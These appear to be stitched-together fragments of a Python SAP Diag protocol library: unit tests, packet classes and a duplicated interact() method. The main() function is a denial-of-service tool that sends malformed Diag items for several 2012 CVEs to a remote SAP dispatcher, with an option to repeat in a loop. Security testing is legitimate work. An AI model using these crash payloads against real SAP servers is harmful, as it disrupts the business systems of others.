def test_sapdiag_items_lookup(self):
    """Test lookup and filtering of SAPDiagItems inside a SAPDiag packet.

    Builds a packet holding one SES item and one APPL/ST_USER/RFC_PARENT_UUID
    item, then exercises ``get_item`` with numeric and symbolic selectors,
    single values and lists, and finally checks that a non-SAPDiagItem layer
    appended to the message does not break the lookup.
    """
    packet = SAPDiag()
    ses_item = SAPDiagItem(item_type="SES")
    packet.message.append(ses_item)
    appl_item = SAPDiagItem(item_type="APPL", item_id="ST_USER", item_sid="RFC_PARENT_UUID")
    packet.message.append(appl_item)

    # The SES item is reachable by numeric type and by name, not by the APPL type
    for selector in (0x1, "SES"):
        self.assertIn(ses_item, packet.get_item(selector))
    for selector in (0x10, "APPL"):
        self.assertNotIn(ses_item, packet.get_item(selector))

    # APPL item: type, type+id and type+id+sid, each in numeric and symbolic form
    appl_matches = [
        (0x10,),
        ("APPL",),
        ("APPL", 0x04),
        ("APPL", "ST_USER"),
        ("APPL", 0x04, 0x10),
        ("APPL", "ST_USER", 0x10),
        ("APPL", "ST_USER", "RFC_PARENT_UUID"),
    ]
    for args in appl_matches:
        self.assertIn(appl_item, packet.get_item(*args))

    appl_misses = [
        (0x1,),
        ("APPL4",),
        ("APPL", 0x06),
        ("APPL", "ST_R3INFO"),
        ("APPL", 0x04, 0x02),
        ("APPL", "ST_USER", 0x02),
        ("APPL", "ST_USER", "CONNECT"),
    ]
    for args in appl_misses:
        self.assertNotIn(appl_item, packet.get_item(*args))

    # List selectors return every matching item, in message order
    both_items = [ses_item, appl_item]
    self.assertListEqual(both_items, packet.get_item([0x01, 0x10]))
    self.assertListEqual(both_items, packet.get_item(["SES", "APPL"]))

    list_matches = [
        (["APPL"], [0x04, 0x06]),
        (["APPL"], ["ST_USER", "ST_R3INFO"]),
        (["APPL"], 0x04, [0x02, 0x10]),
        (["APPL"], "ST_USER", ["RFC_PARENT_UUID", "CONNECT"]),
    ]
    for args in list_matches:
        self.assertIn(appl_item, packet.get_item(*args))

    list_misses = [
        (["SES", "APPL4"],),
        (["APPL"], ["ST_R3INFO"]),
        (["APPL"], ["ST_USER"], ["CONNECT"]),
    ]
    for args in list_misses:
        self.assertNotIn(appl_item, packet.get_item(*args))

    # Insert a wrong item and observe that the lookup still works
    packet.message.append(Raw("\x00" * 10))
    self.assertIn(ses_item, packet.get_item("SES"))
    self.assertIn(appl_item, packet.get_item(["APPL"], "ST_USER", ["RFC_PARENT_UUID", "CONNECT"]))
def test_sapdiag_header_dissection_compressed(self):
    """Test SAPDiag headers dissection with compression.

    A compressed packet carrying a single item is serialized and parsed back;
    the first item of the dissected message must serialize identically.
    """
    payload = SAPDiagItem(item_value="TEST_COMPRESSED")
    original = SAPDiag(compress=1)
    original.message.append(payload)
    rebuilt = SAPDiag(str(original))
    self.assertEqual(str(original.message[0]), str(rebuilt.message[0]))
def test_sapdiag_header_dissection_plain(self):
    """Test SAPDiag headers dissection without compression.

    An uncompressed packet carrying a single item must round-trip through
    serialization and dissection unchanged.
    """
    payload = SAPDiagItem(item_value="TEST_PLAIN")
    original = SAPDiag(compress=0)
    original.message.append(payload)
    rebuilt = SAPDiag(str(original))
    self.assertEqual(str(original), str(rebuilt))
def interact(self, message):
    """Interacts with the SAP Diag server, adding the :class:`SAPDiagStep` item
    and ending with a 'end of message' item.

    The ``message`` list is modified in place: the step item is inserted at
    the front and an EOM item is appended before sending. The dialog step
    counter is only advanced when the connection has been initialized.

    :param message: items to send
    :type message: ``list`` of :class:`SAPDiagItem`

    :return: server's response, or ``None`` if the connection is not initialized
    :rtype: :class:`SAPNI<SAPNI.SAPNI>`
    """
    if not self.initialized:
        return None

    self.step += 1
    step_item = SAPDiagItem(item_type="APPL", item_id="ST_USER", item_sid=0x26,
                            item_value=SAPDiagStep(step=self.step))
    message.insert(0, step_item)
    message.append(SAPDiagItem(item_type="EOM"))
    return self.sr_message(message)
def interact(self, message):
    """Interacts with the SAP Diag server, adding the L{SAPDiagStep} item and
    ending with a 'end of message' item. C{message} is extended in place
    (step item prepended, EOM item appended) before it is sent; nothing is
    sent and the step counter is untouched when the connection is not
    initialized.

    @param message: items to send
    @type message: C{list} of L{SAPDiagItem}

    @return: server's response, or C{None} when not initialized
    @rtype: L{SAPNI<SAPNI.SAPNI>}
    """
    if not self.initialized:
        return None

    self.step = self.step + 1
    step_item = SAPDiagItem(item_type="APPL", item_id="ST_USER", item_sid=0x26,
                            item_value=SAPDiagStep(step=self.step))
    end_of_message = SAPDiagItem(item_type="EOM")
    message[0:0] = [step_item]
    message.append(end_of_message)
    return self.sr_message(message)
def get_support_data_item(self, support_data):
    """Normalizes a support-data value into a SUPPORTDATA :class:`SAPDiagItem`.

    Inputs are converted in cascade: a string is passed through ``unhex``
    (presumably hex-encoded) and wrapped in :class:`SAPDiagSupportBits`; a
    :class:`SAPDiagSupportBits` is wrapped in an APPL/ST_USER/SUPPORTDATA
    item; a ready-made :class:`SAPDiagItem` is returned as is.

    :param support_data: string, :class:`SAPDiagSupportBits` or :class:`SAPDiagItem`

    :return: the resulting :class:`SAPDiagItem`, or ``None`` for any other type
    """
    value = support_data
    if isinstance(value, str):
        value = SAPDiagSupportBits(unhex(value))
    if isinstance(value, SAPDiagSupportBits):
        value = SAPDiagItem(item_type="APPL", item_id="ST_USER", item_sid="SUPPORTDATA",
                            item_value=value)
    return value if isinstance(value, SAPDiagItem) else None
def main():
    """Command-line entry point.

    Parses the options, builds the test item for the selected CVE (or exits
    on an unknown selection), then hands it to ``send_crash`` either once or
    in rounds until interrupted. ``parse_options`` and ``send_crash`` are
    defined elsewhere in this file.
    """
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    print("[*] Testing Dispatcher DoS vulnerabilities on host %s:%d" % (options.remote_host, options.remote_port))

    # Crafting the item according to the CVE selected
    if options.cve == 1:
        print("[*] Crash in DiagTraceHex (CVE-2012-2612) using a DataStream (Diag XML Blob) "
              "(requires Dialog Developer Trace enabled at level 2 or 3)")
        item = SAPDiagItem(item_type="DIAG_XMLBLOB", item_length=0xFFFFFFFF, item_value="Crash!")
    elif options.cve == 2:
        print("[*] Crash in DiagTraceHex (CVE-2012-2612) using a variable ST_USER ST_USER_PASSPORT_DATA item "
              "(requires Dialog Developer Trace enabled at level 2 or 3)")
        item = SAPDiagItem(item_type="APPL4", item_id="ST_USER", item_sid=0x18, item_length=0xFFFFFFFF, item_value="Crash!")
    elif options.cve == 3:
        print("[*] Crash in DiagTraceAtoms (CVE-2012-2511) using a DYNT ATOM item "
              "(requires Dialog Developer Trace enabled at level 2 or 3)")
        item = SAPDiagItem(item_type="APPL4", item_id="DYNT", item_sid=0x02, item_value="\x80" * 8)
    elif options.cve == 4:
        print("[*] Crash in DiagTraceStreamI (CVE-2012-2512) using a RCUI RCUI_CONNECT_DATA item "
              "(requires Dialog Developer Trace enabled at level 2 or 3)")
        item = SAPDiagItem(item_type="APPL", item_id="RCUI", item_sid=0x09, item_length=0xFF, item_value="\x12\x1A\x59\x51")
    elif options.cve == 5:
        print("[*] Crash in diaginput (CVE-2012-2513) using a VARINFO MAINAREA_PIXELSIZE item")
        item = SAPDiagItem(item_type="APPL", item_id="VARINFO", item_sid=0x0e, item_value="A" * 10)
    elif options.cve == 6:
        print("[*] Crash in DiagiEventSource (CVE-2012-2514) using a UI_EVENT UI_EVENT_SOURCE item")
        item = SAPDiagItem(item_type="APPL", item_id="UI_EVENT", item_sid=0x01, item_value="A" * 16)
    else:
        # No item to send: bail out before touching the network
        print("[-] Invalid CVE specified!")
        return

    if options.loop:
        # Keep sending rounds, pausing options.delay seconds between them, until Ctrl-C
        try:
            while True:
                if options.verbose:
                    print("[*] Started a new round")
                send_crash(options.remote_host, options.remote_port, item, options.number,
                           options.verbose, options.terminal, options.route_string)
                sleep(options.delay)
        except KeyboardInterrupt:
            print("[*] Cancelled by the user")
    else:
        print("[*] Selected a single round")
        send_crash(options.remote_host, options.remote_port, item, options.number,
                   options.verbose, options.terminal, options.route_string)
        print("[*] Crash sent, take a look at the work processes !")
def test_sapdiag_items_bind(self):
    """Test binding of SAPDiagItem classes.

    Registers a throw-away Packet class for APPL/0x99/0xff, dissects a raw
    item carrying that type/id/sid and checks that the item value is parsed
    as the bound class and that the class registry lookup returns it.
    """
    class SAPDiagItemTest(Packet):
        fields_desc = [StrField("strfield", None)]

    bind_diagitem(SAPDiagItemTest, "APPL", 0x99, 0xff)

    payload = "strfield"
    expected_value = SAPDiagItemTest(strfield=payload)
    # Raw item: type 0x10 (APPL), id 0x99, sid 0xff, 2-byte big-endian length, value
    raw_item = "\x10\x99\xff" + pack("!H", len(payload)) + payload
    item = SAPDiagItem(raw_item)

    self.assertEqual(item.item_value, expected_value)
    self.assertEqual(item.item_length, len(payload))
    self.assertEqual(item.item_value.strfield, payload)
    self.assertEqual(str(item.item_value), str(expected_value))
    self.assertIs(diag_item_get_class(item, "APPL", 0x99, 0xff), SAPDiagItemTest)
def test_sapdiag_header_build(self):
    """Test SAPDiag headers building.

    The serialized message must not depend on the ``compress`` flag, and two
    headers differing only in that flag must serialize identically once the
    flag is cleared on the compressed one.
    """
    payload = SAPDiagItem(item_value="TEST")

    plain = SAPDiag(compress=0)
    plain.message.append(payload)
    plain_message = str(plain.message)

    compressed = SAPDiag(compress=1)
    compressed.message.append(payload)
    compressed_message = str(compressed.message)

    self.assertEqual(plain_message, compressed_message)

    compressed.compress = 0
    self.assertEqual(str(plain), str(compressed))
# 3000 0x00000bb8 SAP GUI Windows #


class SAPDiagUserConnect(Packet):
    """SAP Diag User Connect item (APPL / ST_USER / sid 0x02).

    Carries the client's protocol version, code page and workstation type.
    """
    name = "SAP Diag User Connect"
    fields_desc = [
        IntField("protocol_version", 100200),
        IntField("code_page", 1100),
        IntField("ws_type", 5001),
    ]


bind_diagitem(SAPDiagUserConnect, "APPL", 0x04, 0x02)

# Ready-made user connect items; the two differ only in protocol_version.
user_connect_compressed = SAPDiagItem(item_type="APPL", item_id="ST_USER", item_sid=0x02,
                                      item_value=SAPDiagUserConnect())
user_connect_uncompressed = SAPDiagItem(item_type="APPL", item_id="ST_USER", item_sid=0x02,
                                        item_value=SAPDiagUserConnect(protocol_version=200))


# Diag Dialog step item
class SAPDiagStep(Packet):
    """SAP Diag Dialog Step item, carrying the dialog step counter."""
    name = "SAP Diag Dialog Step"
    fields_desc = [IntField("step", 0)]
def test_sapdiag_item(self):
    """Test construction of SAPDiag Items: an unknown item type is rejected with KeyError."""
    self.assertRaises(KeyError, SAPDiagItem, item_type="LALA")